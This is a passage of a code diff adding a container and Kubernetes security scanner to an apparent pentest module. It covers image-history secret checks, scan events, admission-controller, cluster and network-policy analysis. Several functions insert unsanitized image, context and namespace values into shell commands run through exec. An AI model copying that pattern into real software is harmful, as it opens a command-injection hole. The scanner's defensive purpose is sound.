+  /**
+   * Check image history for secrets
+   */
+  export async function scanImageHistory(
+    image: string,
+    scanId: string
+  ): Promise<ContainerScanTypes.ContainerFinding[]> {
+    try {
+      const { stdout } = await execAsync(`docker history --no-trunc ${image}`)
+      const findings = scanText(stdout, image, "image")
+
+      for (const finding of findings) {
+        Bus.publish(ContainerScanEvents.SecretDetected, {
+          scanId,
+          resourceType: "image",
+          resourceName: image,
+          secretType: finding.title,
+          location: "Image History",
+        })
+      }
+
+      log.info("Image history scan complete", { image, secretsFound: findings.length })
+      return findings
+    } catch (error) {
+      log.error("Image history scan failed", { image, error })
+      return []
+    }
+  }
+
+  /**
+   * Obscure secret value for safe display
+   */
+  function obscureSecret(value: string): string {
+    if (value.length <= 8) return "****"
+    return value.slice(0, 4) + "****" + value.slice(-4)
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    resourceName: string,
+    resourceType: "image" | "container",
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    evidence: Record<string, unknown>
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `secret-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "secret",
+      severity,
+      title,
+      description,
+      resource: {
+        type: resourceType,
+        name: resourceName,
+      },
+      remediation: "Remove or rotate the exposed secret and update the image/container",
+      evidence,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Map Trivy severity
+   */
+  function mapSeverity(severity: string): ContainerScanTypes.Severity {
+    switch (severity?.toUpperCase()) {
+      case "CRITICAL":
+        return "critical"
+      case "HIGH":
+        return "high"
+      case "MEDIUM":
+        return "medium"
+      case "LOW":
+        return "low"
+      default:
+        return "medium"
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/events.ts b/packages/opencode/src/pentest/containerscan/events.ts
new file mode 100644
index 00000000000..14241d541ab
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/events.ts
@@ -0,0 +1,251 @@
+/**
+ * @fileoverview Container Scanner Events
+ *
+ * Bus event definitions for container security scanning operations.
+ *
+ * @module pentest/containerscan/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+import { ContainerScanTypes } from "./types"
+
+/**
+ * Container scanner events namespace.
+ */
+export namespace ContainerScanEvents {
+  /**
+   * Container scan started.
+   */
+  export const ScanStarted = BusEvent.define(
+    "pentest.containerscan.scan_started",
+    z.object({
+      scanId: z.string(),
+      profile: ContainerScanTypes.ProfileId,
+      targets: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Container scan completed.
+   */
+  export const ScanCompleted = BusEvent.define(
+    "pentest.containerscan.scan_completed",
+    z.object({
+      scanId: z.string(),
+      profile: ContainerScanTypes.ProfileId,
+      duration: z.number(),
+      imagesScanned: z.number(),
+      containersScanned: z.number(),
+      totalVulnerabilities: z.number(),
+      findingsCount: z.number(),
+    })
+  )
+
+  /**
+   * Container scan failed.
+   */
+  export const ScanFailed = BusEvent.define(
+    "pentest.containerscan.scan_failed",
+    z.object({
+      scanId: z.string(),
+      error: z.string(),
+      phase: z.string().optional(),
+    })
+  )
+
+  /**
+   * Docker image discovered.
+   */
+  export const ImageDiscovered = BusEvent.define(
+    "pentest.containerscan.image_discovered",
+    z.object({
+      scanId: z.string(),
+      image: z.string(),
+      imageId: z.string(),
+      size: z.number(),
+    })
+  )
+
+  /**
+   * Image scan completed.
+   */
+  export const ImageScanned = BusEvent.define(
+    "pentest.containerscan.image_scanned",
+    z.object({
+      scanId: z.string(),
+      image: z.string(),
+      tool: z.string(),
+      vulnerabilityCount: z.number(),
+      criticalCount: z.number(),
+      highCount: z.number(),
+    })
+  )
+
+  /**
+   * Running container discovered.
+   */
+  export const ContainerDiscovered = BusEvent.define(
+    "pentest.containerscan.container_discovered",
+    z.object({
+      scanId: z.string(),
+      containerId: z.string(),
+      name: z.string(),
+      image: z.string(),
+      state: z.string(),
+    })
+  )
+
+  /**
+   * Vulnerability found in image.
+   */
+  export const VulnerabilityFound = BusEvent.define(
+    "pentest.containerscan.vulnerability_found",
+    z.object({
+      scanId: z.string(),
+      image: z.string(),
+      cveId: z.string().optional(),
+      severity: ContainerScanTypes.Severity,
+      packageName: z.string(),
+      installedVersion: z.string(),
+      fixedVersion: z.string().optional(),
+    })
+  )
+
+  /**
+   * Misconfiguration found.
+   */
+  export const MisconfigurationFound = BusEvent.define(
+    "pentest.containerscan.misconfiguration_found",
+    z.object({
+      scanId: z.string(),
+      resourceType: z.string(),
+      resourceName: z.string(),
+      severity: ContainerScanTypes.Severity,
+      title: z.string(),
+      description: z.string(),
+    })
+  )
+
+  /**
+   * Secret detected in image or container.
+   */
+  export const SecretDetected = BusEvent.define(
+    "pentest.containerscan.secret_detected",
+    z.object({
+      scanId: z.string(),
+      resourceType: z.string(),
+      resourceName: z.string(),
+      secretType: z.string(),
+      location: z.string(),
+    })
+  )
+
+  /**
+   * SBOM generated for image.
+   */
+  export const SBOMGenerated = BusEvent.define(
+    "pentest.containerscan.sbom_generated",
+    z.object({
+      scanId: z.string(),
+      image: z.string(),
+      format: z.string(),
+      componentCount: z.number(),
+    })
+  )
+
+  /**
+   * Compliance check completed.
+   */
+  export const ComplianceChecked = BusEvent.define(
+    "pentest.containerscan.compliance_checked",
+    z.object({
+      scanId: z.string(),
+      framework: ContainerScanTypes.ComplianceFramework,
+      passed: z.number(),
+      failed: z.number(),
+      skipped: z.number(),
+    })
+  )
+
+  /**
+   * Compliance violation found.
+   */
+  export const ComplianceViolation = BusEvent.define(
+    "pentest.containerscan.compliance_violation",
+    z.object({
+      scanId: z.string(),
+      framework: ContainerScanTypes.ComplianceFramework,
+      checkId: z.string(),
+      title: z.string(),
+      severity: ContainerScanTypes.Severity,
+    })
+  )
+
+  /**
+   * Kubernetes cluster discovered.
+   */
+  export const ClusterDiscovered = BusEvent.define(
+    "pentest.containerscan.cluster_discovered",
+    z.object({
+      scanId: z.string(),
+      name: z.string(),
+      context: z.string(),
+      server: z.string(),
+    })
+  )
+
+  /**
+   * Kubernetes pod analyzed.
+   */
+  export const PodAnalyzed = BusEvent.define(
+    "pentest.containerscan.pod_analyzed",
+    z.object({
+      scanId: z.string(),
+      name: z.string(),
+      namespace: z.string(),
+      findingsCount: z.number(),
+    })
+  )
+
+  /**
+   * RBAC issue found.
+   */
+  export const RBACIssueFound = BusEvent.define(
+    "pentest.containerscan.rbac_issue_found",
+    z.object({
+      scanId: z.string(),
+      bindingName: z.string(),
+      kind: z.string(),
+      severity: ContainerScanTypes.Severity,
+      issue: z.string(),
+    })
+  )
+
+  /**
+   * Registry image discovered.
+   */
+  export const RegistryImageFound = BusEvent.define(
+    "pentest.containerscan.registry_image_found",
+    z.object({
+      scanId: z.string(),
+      registry: z.string(),
+      repository: z.string(),
+      tag: z.string(),
+      digest: z.string().optional(),
+    })
+  )
+
+  /**
+   * Scan progress update.
+   */
+  export const ScanProgress = BusEvent.define(
+    "pentest.containerscan.scan_progress",
+    z.object({
+      scanId: z.string(),
+      phase: z.string(),
+      progress: z.number(),
+      message: z.string(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/containerscan/index.ts b/packages/opencode/src/pentest/containerscan/index.ts
new file mode 100644
index 00000000000..13c2a7c19ac
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/index.ts
@@ -0,0 +1,34 @@
+/**
+ * @fileoverview Container Security Scanner Module
+ *
+ * Exports for container security scanning functionality.
+ *
+ * @module pentest/containerscan
+ */
+
+// Core exports
+export { ContainerScanTypes } from "./types"
+export { ContainerScanEvents } from "./events"
+export { ContainerScanStorage, type StorageConfig } from "./storage"
+export { ContainerScanProfiles } from "./profiles"
+export { ContainerScanOrchestrator, type OrchestratorOptions } from "./orchestrator"
+export { ContainerScanTool } from "./tool"
+
+// Parser exports
+export { TrivyParser, GrypeParser, SyftParser, KubeauditParser } from "./parsers"
+
+// Docker exports
+export { DockerImages, DockerContainers, DockerConfig, DockerSecrets } from "./docker"
+
+// Kubernetes exports
+export {
+  KubernetesCluster,
+  KubernetesPods,
+  KubernetesRBAC,
+  KubernetesNetwork,
+  KubernetesSecrets,
+  KubernetesAdmission,
+} from "./kubernetes"
+
+// Registry exports
+export { RegistryScanner, DockerHub, AWSECR, AzureACR, GoogleGCR } from "./registry"
diff --git a/packages/opencode/src/pentest/containerscan/kubernetes/admission.ts b/packages/opencode/src/pentest/containerscan/kubernetes/admission.ts
new file mode 100644
index 00000000000..3361d8eec33
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/kubernetes/admission.ts
@@ -0,0 +1,318 @@
+/**
+ * @fileoverview Kubernetes Admission Controller Analyzer
+ *
+ * Analyzes admission controller configuration for security.
+ *
+ * @module pentest/containerscan/kubernetes/admission
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.kubernetes.admission" })
+
+/**
+ * Expected admission controllers
+ */
+const RECOMMENDED_ADMISSION_CONTROLLERS = [
+  "NodeRestriction",
+  "PodSecurityPolicy",
+  "PodSecurity",
+  "AlwaysPullImages",
+  "ImagePolicyWebhook",
+]
+
+/**
+ * Kubernetes Admission namespace
+ */
+export namespace KubernetesAdmission {
+  /**
+   * List validating webhook configurations
+   */
+  export async function listValidatingWebhooks(): Promise<
+    {
+      name: string
+      webhooks: { name: string; failurePolicy: string; rules: unknown[] }[]
+    }[]
+  > {
+    try {
+      const { stdout } = await execAsync("kubectl get validatingwebhookconfigurations -o json")
+      const data = JSON.parse(stdout)
+
+      return (data.items || []).map((item: Record<string, unknown>) => ({
+        name: (item.metadata as Record<string, string>)?.name,
+        webhooks: ((item.webhooks || []) as Record<string, unknown>[]).map((wh) => ({
+          name: wh.name as string,
+          failurePolicy: wh.failurePolicy as string,
+          rules: wh.rules as unknown[],
+        })),
+      }))
+    } catch (error) {
+      log.error("Failed to list validating webhooks", { error })
+      return []
+    }
+  }
+
+  /**
+   * List mutating webhook configurations
+   */
+  export async function listMutatingWebhooks(): Promise<
+    {
+      name: string
+      webhooks: { name: string; failurePolicy: string; rules: unknown[] }[]
+    }[]
+  > {
+    try {
+      const { stdout } = await execAsync("kubectl get mutatingwebhookconfigurations -o json")
+      const data = JSON.parse(stdout)
+
+      return (data.items || []).map((item: Record<string, unknown>) => ({
+        name: (item.metadata as Record<string, string>)?.name,
+        webhooks: ((item.webhooks || []) as Record<string, unknown>[]).map((wh) => ({
+          name: wh.name as string,
+          failurePolicy: wh.failurePolicy as string,
+          rules: wh.rules as unknown[],
+        })),
+      }))
+    } catch (error) {
+      log.error("Failed to list mutating webhooks", { error })
+      return []
+    }
+  }
+
+  /**
+   * Check Pod Security Admission configuration
+   */
+  export async function checkPodSecurityAdmission(): Promise<{
+    enabled: boolean
+    enforceLevel?: string
+    auditLevel?: string
+    warnLevel?: string
+  }> {
+    try {
+      // Check for namespace labels that indicate PSA is configured
+      const { stdout } = await execAsync(
+        "kubectl get namespaces -o jsonpath='{range .items[*]}{.metadata.name}:{.metadata.labels}{\"\\n\"}{end}'"
+      )
+
+      const lines = stdout.replace(/'/g, "").split("\n").filter(Boolean)
+      let enabled = false
+      let enforceLevel: string | undefined
+      let auditLevel: string | undefined
+      let warnLevel: string | undefined
+
+      for (const line of lines) {
+        if (line.includes("pod-security.kubernetes.io/enforce")) {
+          enabled = true
+          const match = line.match(/pod-security\.kubernetes\.io\/enforce:([a-z]+)/)
+          if (match) enforceLevel = match[1]
+        }
+        if (line.includes("pod-security.kubernetes.io/audit")) {
+          const match = line.match(/pod-security\.kubernetes\.io\/audit:([a-z]+)/)
+          if (match) auditLevel = match[1]
+        }
+        if (line.includes("pod-security.kubernetes.io/warn")) {
+          const match = line.match(/pod-security\.kubernetes\.io\/warn:([a-z]+)/)
+          if (match) warnLevel = match[1]
+        }
+      }
+
+      return { enabled, enforceLevel, auditLevel, warnLevel }
+    } catch (error) {
+      log.error("Failed to check Pod Security Admission", { error })
+      return { enabled: false }
+    }
+  }
+
+  /**
+   * Analyze admission controllers
+   */
+  export async function analyze(): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    try {
+      // Check validating webhooks
+      const validatingWebhooks = await listValidatingWebhooks()
+      const mutatingWebhooks = await listMutatingWebhooks()
+
+      // Check for webhooks with Fail failure policy (can cause availability issues)
+      for (const config of [...validatingWebhooks, ...mutatingWebhooks]) {
+        for (const webhook of config.webhooks) {
+          if (webhook.failurePolicy === "Fail") {
+            findings.push(createFinding(
+              "low",
+              `Webhook with Fail Policy: ${webhook.name}`,
+              `Webhook ${webhook.name} in ${config.name} has failurePolicy: Fail. If the webhook is unavailable, requests will be rejected.`,
+              "Consider using Ignore policy with monitoring, or ensure high availability of webhook endpoint"
+            ))
+          }
+        }
+      }
+
+      // Check for missing Pod Security Admission
+      const psa = await checkPodSecurityAdmission()
+      if (!psa.enabled) {
+        findings.push(createFinding(
+          "high",
+          "Pod Security Admission Not Configured",
+          "Pod Security Admission is not configured on any namespace. This allows pods to run without security restrictions.",
+          "Configure Pod Security Admission labels on namespaces with at least 'baseline' level"
+        ))
+      } else {
+        // Check if enforce level is too permissive
+        if (psa.enforceLevel === "privileged") {
+          findings.push(createFinding(
+            "medium",
+            "Pod Security Admission at Privileged Level",
+            "Pod Security Admission is configured but at 'privileged' level, which allows unrestricted pods.",
+            "Consider using 'baseline' or 'restricted' enforce level"
+          ))
+        }
+      }
+
+      // Check for image policy webhook
+      const hasImagePolicy = validatingWebhooks.some(
+        (c) => c.name.toLowerCase().includes("image") || c.webhooks.some((w) => w.name.toLowerCase().includes("image"))
+      )
+      if (!hasImagePolicy) {
+        findings.push(createFinding(
+          "medium",
+          "No Image Policy Webhook",
+          "No image policy webhook found. Consider implementing image scanning and signing verification.",
+          "Deploy an image policy webhook like Kyverno, OPA Gatekeeper, or similar"
+        ))
+      }
+
+      // Check for general policy engine
+      const hasPolicyEngine = validatingWebhooks.some((c) =>
+        ["kyverno", "gatekeeper", "opa", "policy"].some((p) => c.name.toLowerCase().includes(p))
+      )
+      if (!hasPolicyEngine) {
+        findings.push(createFinding(
+          "medium",
+          "No Policy Engine Detected",
+          "No policy engine (Kyverno, OPA Gatekeeper) detected. Consider implementing policy-as-code.",
+          "Deploy a policy engine for enforcing security policies"
+        ))
+      }
+
+      // Check webhook count
+      const totalWebhooks = validatingWebhooks.reduce((acc, c) => acc + c.webhooks.length, 0) +
+        mutatingWebhooks.reduce((acc, c) => acc + c.webhooks.length, 0)
+
+      if (totalWebhooks === 0) {
+        findings.push(createFinding(
+          "high",
+          "No Admission Webhooks Configured",
+          "No admission webhooks are configured. The cluster has no admission controls beyond built-in controllers.",
+          "Deploy admission controllers for policy enforcement"
+        ))
+      }
+
+      log.info("Admission controller analysis complete", { findings: findings.length })
+      return findings
+    } catch (error) {
+      log.error("Admission controller analysis failed", { error })
+      throw error
+    }
+  }
+
+  /**
+   * List namespaces with Pod Security Admission
+   */
+  export async function listNamespacePSA(): Promise<
+    {
+      namespace: string
+      enforce?: string
+      audit?: string
+      warn?: string
+    }[]
+  > {
+    try {
+      const { stdout } = await execAsync("kubectl get namespaces -o json")
+      const data = JSON.parse(stdout)
+
+      const results: { namespace: string; enforce?: string; audit?: string; warn?: string }[] = []
+
+      for (const item of data.items || []) {
+        const name = item.metadata?.name as string
+        const labels = item.metadata?.labels as Record<string, string> || {}
+
+        const enforce = labels["pod-security.kubernetes.io/enforce"]
+        const audit = labels["pod-security.kubernetes.io/audit"]
+        const warn = labels["pod-security.kubernetes.io/warn"]
+
+        if (enforce || audit || warn) {
+          results.push({ namespace: name, enforce, audit, warn })
+        }
+      }
+
+      return results
+    } catch (error) {
+      log.error("Failed to list namespace PSA", { error })
+      return []
+    }
+  }
+
+  /**
+   * Get summary of admission configuration
+   */
+  export async function getSummary(): Promise<{
+    validatingWebhooks: number
+    mutatingWebhooks: number
+    namespacesWithPSA: number
+    hasPolicyEngine: boolean
+    hasImagePolicy: boolean
+  }> {
+    const validatingWebhooks = await listValidatingWebhooks()
+    const mutatingWebhooks = await listMutatingWebhooks()
+    const psa = await listNamespacePSA()
+
+    const hasPolicyEngine = validatingWebhooks.some((c) =>
+      ["kyverno", "gatekeeper", "opa"].some((p) => c.name.toLowerCase().includes(p))
+    )
+
+    const hasImagePolicy = validatingWebhooks.some((c) =>
+      c.name.toLowerCase().includes("image") || c.webhooks.some((w) => w.name.toLowerCase().includes("image"))
+    )
+
+    return {
+      validatingWebhooks: validatingWebhooks.reduce((acc, c) => acc + c.webhooks.length, 0),
+      mutatingWebhooks: mutatingWebhooks.reduce((acc, c) => acc + c.webhooks.length, 0),
+      namespacesWithPSA: psa.length,
+      hasPolicyEngine,
+      hasImagePolicy,
+    }
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    remediation: string
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `k8s-admission-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "misconfiguration",
+      severity,
+      title,
+      description,
+      resource: {
+        type: "cluster",
+        name: "admission-controllers",
+      },
+      remediation,
+      compliance: [
+        { framework: "cis-kubernetes", control: "Admission Control" },
+        { framework: "nsa-cisa", control: "Admission Controllers" },
+      ],
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/kubernetes/cluster.ts b/packages/opencode/src/pentest/containerscan/kubernetes/cluster.ts
new file mode 100644
index 00000000000..193322bbbc3
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/kubernetes/cluster.ts
@@ -0,0 +1,337 @@
+/**
+ * @fileoverview Kubernetes Cluster Scanner
+ *
+ * Enumerates and analyzes Kubernetes cluster configuration.
+ *
+ * @module pentest/containerscan/kubernetes/cluster
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { Bus } from "../../../bus"
+import { ContainerScanTypes } from "../types"
+import { ContainerScanEvents } from "../events"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.kubernetes.cluster" })
+
+/**
+ * Kubernetes Cluster namespace
+ */
+export namespace KubernetesCluster {
+  /**
+   * Get current cluster info
+   */
+  export async function getClusterInfo(): Promise<ContainerScanTypes.KubernetesCluster> {
+    try {
+      // Get current context
+      const { stdout: contextOut } = await execAsync("kubectl config current-context")
+      const context = contextOut.trim()
+
+      // Get cluster server
+      const { stdout: serverOut } = await execAsync(
+        `kubectl config view -o jsonpath='{.clusters[?(@.name=="'$(kubectl config view -o jsonpath='{.contexts[?(@.name=="'${context}'")].context.cluster}')'")].cluster.server}'`
+      )
+
+      // Get version info
+      let version: string | undefined
+      try {
+        const { stdout: versionOut } = await execAsync("kubectl version --client=false -o json")
+        const versionData = JSON.parse(versionOut)
+        version = versionData.serverVersion?.gitVersion
+      } catch {
+        // Version might not be accessible
+      }
+
+      // Get node count
+      let nodeCount: number | undefined
+      try {
+        const { stdout: nodesOut } = await execAsync("kubectl get nodes -o json")
+        const nodesData = JSON.parse(nodesOut)
+        nodeCount = nodesData.items?.length
+      } catch {
+        // Nodes might not be accessible
+      }
+
+      // Get pod count
+      let podCount: number | undefined
+      try {
+        const { stdout: podsOut } = await execAsync("kubectl get pods --all-namespaces -o json")
+        const podsData = JSON.parse(podsOut)
+        podCount = podsData.items?.length
+      } catch {
+        // Pods might not be accessible
+      }
+
+      const cluster: ContainerScanTypes.KubernetesCluster = {
+        name: context,
+        context,
+        server: serverOut.trim().replace(/'/g, ""),
+        version,
+        namespace: "default",
+        nodeCount,
+        podCount,
+      }
+
+      log.info("Cluster info retrieved", { context, version, nodeCount, podCount })
+      return cluster
+    } catch (error) {
+      log.error("Failed to get cluster info", { error })
+      throw new Error(`Failed to get cluster info: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * List available contexts
+   */
+  export async function listContexts(): Promise<{ name: string; cluster: string; current: boolean }[]> {
+    try {
+      const { stdout } = await execAsync("kubectl config get-contexts -o json")
+      const data = JSON.parse(stdout)
+
+      return (data.items || data || []).map((ctx: Record<string, unknown>) => ({
+        name: ctx.name || (ctx as Record<string, Record<string, string>>).context?.name,
+        cluster: (ctx as Record<string, Record<string, string>>).context?.cluster || "",
+        current: ctx.current === "*" || ctx.current === true,
+      }))
+    } catch {
+      // Fallback for older kubectl versions
+      const { stdout } = await execAsync("kubectl config get-contexts")
+      const lines = stdout.trim().split("\n").slice(1) // Skip header
+      return lines.map((line) => {
+        const parts = line.trim().split(/\s+/)
+        const current = parts[0] === "*"
+        const name = current ? parts[1] : parts[0]
+        const cluster = current ? parts[2] : parts[1]
+        return { name, cluster, current }
+      })
+    }
+  }
+
+  /**
+   * Switch context
+   */
+  export async function switchContext(contextName: string): Promise<void> {
+    try {
+      await execAsync(`kubectl config use-context ${contextName}`)
+      log.info("Context switched", { context: contextName })
+    } catch (error) {
+      throw new Error(`Failed to switch context: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * List namespaces
+   */
+  export async function listNamespaces(): Promise<string[]> {
+    try {
+      const { stdout } = await execAsync("kubectl get namespaces -o jsonpath='{.items[*].metadata.name}'")
+      return stdout.replace(/'/g, "").split(" ").filter(Boolean)
+    } catch (error) {
+      log.error("Failed to list namespaces", { error })
+      throw new Error(`Failed to list namespaces: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Check if kubectl is available
+   */
+  export async function isKubectlAvailable(): Promise<boolean> {
+    try {
+      await execAsync("kubectl version --client")
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Check cluster connectivity
+   */
+  export async function checkConnectivity(): Promise<{ connected: boolean; error?: string }> {
+    try {
+      await execAsync("kubectl cluster-info", { timeout: 10000 })
+      return { connected: true }
+    } catch (error) {
+      return {
+        connected: false,
+        error: error instanceof Error ? error.message : String(error),
+      }
+    }
+  }
+
+  /**
+   * Get API resources available in cluster
+   */
+  export async function getApiResources(): Promise<{ name: string; shortNames: string[]; namespaced: boolean }[]> {
+    try {
+      const { stdout } = await execAsync("kubectl api-resources -o wide")
+      const lines = stdout.trim().split("\n").slice(1) // Skip header
+      return lines.map((line) => {
+        const parts = line.trim().split(/\s+/)
+        return {
+          name: parts[0],
+          shortNames: parts[1]?.split(",") || [],
+          namespaced: parts[3] === "true",
+        }
+      })
+    } catch (error) {
+      log.error("Failed to get API resources", { error })
+      return []
+    }
+  }
+
+  /**
+   * Analyze cluster security
+   */
+  export async function analyzeCluster(scanId: string): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    try {
+      const cluster = await getClusterInfo()
+
+      // Emit discovery event
+      Bus.publish(ContainerScanEvents.ClusterDiscovered, {
+        scanId,
+        name: cluster.name,
+        context: cluster.context,
+        server: cluster.server,
+      })
+
+      // Check version
+      if (cluster.version) {
+        const isOutdated = await checkVersionStatus(cluster.version)
+        if (isOutdated) {
+          findings.push(createFinding(
+            cluster.name,
+            "high",
+            `Outdated Kubernetes Version: ${cluster.version}`,
+            "Cluster is running an outdated Kubernetes version that may have known vulnerabilities.",
+            "Update the cluster to a supported Kubernetes version"
+          ))
+        }
+      }
+
+      // Check for default namespace usage
+      try {
+        const { stdout } = await execAsync("kubectl get pods -n default -o json")
+        const pods = JSON.parse(stdout)
+        if (pods.items && pods.items.length > 0) {
+          findings.push(createFinding(
+            cluster.name,
+            "low",
+            "Workloads in Default Namespace",
+            `Found ${pods.items.length} pods in the default namespace. Using default namespace is not recommended.`,
+            "Deploy workloads to dedicated namespaces instead of default"
+          ))
+        }
+      } catch {
+        // Default namespace might not be accessible
+      }
+
+      // Check for anonymous authentication
+      try {
+        const { stdout } = await execAsync("kubectl auth can-i --list --as=system:anonymous 2>/dev/null || true")
+        if (stdout && !stdout.includes("no")) {
+          findings.push(createFinding(
+            cluster.name,
+            "critical",
+            "Anonymous Authentication Enabled",
+            "Anonymous users have permissions in the cluster. This could allow unauthorized access.",
+            "Disable anonymous authentication in the API server"
+          ))
+        }
+      } catch {
+        // Auth check might fail
+      }
+
+      // Check for public API server
+      if (cluster.server && !cluster.server.includes("127.0.0.1") && !cluster.server.includes("localhost")) {
+        findings.push(createFinding(
+          cluster.name,
+          "medium",
+          "API Server Publicly Accessible",
+          `Kubernetes API server is accessible at ${cluster.server}. Ensure proper authentication and network policies.`,
+          "Restrict API server access using firewall rules or private endpoints"
+        ))
+      }
+
+      log.info("Cluster analysis complete", { cluster: cluster.name, findings: findings.length })
+      return findings
+    } catch (error) {
+      log.error("Cluster analysis failed", { error })
+      throw error
+    }
+  }
+
+  /**
+   * Get cluster component status
+   */
+  export async function getComponentStatus(): Promise<
+    { name: string; status: string; message: string }[]
+  > {
+    try {
+      const { stdout } = await execAsync("kubectl get componentstatuses -o json")
+      const data = JSON.parse(stdout)
+
+      return (data.items || []).map((item: Record<string, unknown>) => {
+        const conditions = (item.conditions || []) as { type: string; status: string; message: string }[]
+        const healthyCondition = conditions.find((c) => c.type === "Healthy")
+        return {
+          name: (item.metadata as Record<string, string>)?.name || "",
+          status: healthyCondition?.status || "Unknown",
+          message: healthyCondition?.message || "",
+        }
+      })
+    } catch {
+      return []
+    }
+  }
+
+  /**
+   * Check if version is outdated
+   */
+  async function checkVersionStatus(version: string): Promise<boolean> {
+    // Extract major.minor version
+    const match = version.match(/v?(\d+)\.(\d+)/)
+    if (!match) return false
+
+    const major = parseInt(match[1], 10)
+    const minor = parseInt(match[2], 10)
+
+    // Kubernetes supports 3 minor versions
+    // Current latest is around 1.29-1.30
+    const minSupported = 27 // 1.27 is minimum supported as of 2024
+
+    return major === 1 && minor < minSupported
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    clusterName: string,
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    remediation: string
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `k8s-cluster-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "misconfiguration",
+      severity,
+      title,
+      description,
+      resource: {
+        type: "cluster",
+        name: clusterName,
+      },
+      remediation,
+      compliance: [
+        { framework: "cis-kubernetes", control: "Cluster Configuration" },
+      ],
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/kubernetes/index.ts b/packages/opencode/src/pentest/containerscan/kubernetes/index.ts
new file mode 100644
index 00000000000..684ee667eb8
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/kubernetes/index.ts
@@ -0,0 +1,14 @@
+/**
+ * @fileoverview Kubernetes Module
+ *
+ * Exports for Kubernetes cluster, pod, RBAC, and network scanning.
+ *
+ * @module pentest/containerscan/kubernetes
+ */
+
+export { KubernetesCluster } from "./cluster"
+export { KubernetesPods } from "./pods"
+export { KubernetesRBAC } from "./rbac"
+export { KubernetesNetwork } from "./network"
+export { KubernetesSecrets } from "./secrets"
+export { KubernetesAdmission } from "./admission"
diff --git a/packages/opencode/src/pentest/containerscan/kubernetes/network.ts b/packages/opencode/src/pentest/containerscan/kubernetes/network.ts
new file mode 100644
index 00000000000..5cf4bf0c391
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/kubernetes/network.ts
@@ -0,0 +1,323 @@
+/**
+ * @fileoverview Kubernetes Network Policy Analyzer
+ *
+ * Analyzes network policies and configurations.
+ *
+ * @module pentest/containerscan/kubernetes/network
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.kubernetes.network" })
+
+/**
+ * Kubernetes Network namespace
+ */
+export namespace KubernetesNetwork {
+  /**
+   * List network policies
+   */
+  export async function listNetworkPolicies(namespace?: string): Promise<ContainerScanTypes.NetworkPolicy[]> {
+    try {
+      const cmd = namespace
+        ? `kubectl get networkpolicies -n ${namespace} -o json`
+        : "kubectl get networkpolicies --all-namespaces -o json"
+
+      const { stdout } = await execAsync(cmd)
+      const data = JSON.parse(stdout)
+
+      return (data.items || []).map(parseNetworkPolicy)
+    } catch (error) {
+      log.error("Failed to list network policies", { error })
+      throw new Error(`Failed to list network policies: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Get namespaces without network policies
+   */
+  export async function getNamespacesWithoutPolicies(): Promise<string[]> {
+    try {
+      // Get all namespaces
+      const { stdout: nsOut } = await execAsync("kubectl get namespaces -o jsonpath='{.items[*].metadata.name}'")
+      const namespaces = nsOut.replace(/'/g, "").split(" ").filter(Boolean)
+
+      // Get namespaces with network policies
+      const { stdout: npOut } = await execAsync(
+        "kubectl get networkpolicies --all-namespaces -o jsonpath='{.items[*].metadata.namespace}'"
+      )
+      const namespacesWithPolicies = new Set(npOut.replace(/'/g, "").split(" ").filter(Boolean))
+
+      // Find namespaces without policies
+      const withoutPolicies = namespaces.filter((ns) => !namespacesWithPolicies.has(ns))
+
+      // Filter out system namespaces
+      const systemNamespaces = ["kube-system", "kube-public", "kube-node-lease"]
+      return withoutPolicies.filter((ns) => !systemNamespaces.includes(ns))
+    } catch (error) {
+      log.error("Failed to check namespaces", { error })
+      return []
+    }
+  }
+
+  /**
+   * Analyze network policies
+   */
+  export async function analyze(namespace?: string): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    try {
+      // Get network policies
+      const policies = await listNetworkPolicies(namespace)
+
+      // Check namespaces without policies
